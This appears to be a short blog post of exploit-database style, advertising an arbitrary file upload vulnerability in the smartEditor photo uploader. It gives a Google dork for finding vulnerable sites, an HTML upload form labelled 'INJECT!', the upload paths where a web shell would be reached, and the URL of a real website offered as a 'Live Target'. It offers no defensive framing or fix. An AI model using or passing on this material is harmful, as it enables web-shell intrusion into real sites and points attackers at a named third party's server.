Shiro Tenshi On 09/10/16



# Exploit Title: smartEditor Photo Uploader Vulnerability
# Google Dork: inurl:/common/lib/smartEditor/
# Date: 10/10/2016
# Software Link: http://dev.naver.com/projects/smarteditor
# Version: Any Version
# Tested on: Windows
# Author : AnoaGhost

CSRF HTML :
<form method="POST" action="target/path/common/lib/smartEditor/photo_uploader/popup/file_uploader.php" enctype="multipart/form-data">
<input type="file" name="Filedata" /><button>INJECT!</button>
</form>

Proof of Concept :
target/path/common/lib/smartEditor/photo_uploader/popup/file_uploader.php
target/path/common/lib/smartEditor/photo_uploader/popup/FileUploader.php

Shell Access :
target/path/common/lib/smartEditor/upload/

Live Target :
http://www.taejoon.co.kr/common/lib/smartEditor/photo_uploader/popup/

Leave a Reply

Subscribe to Posts | Subscribe to Comments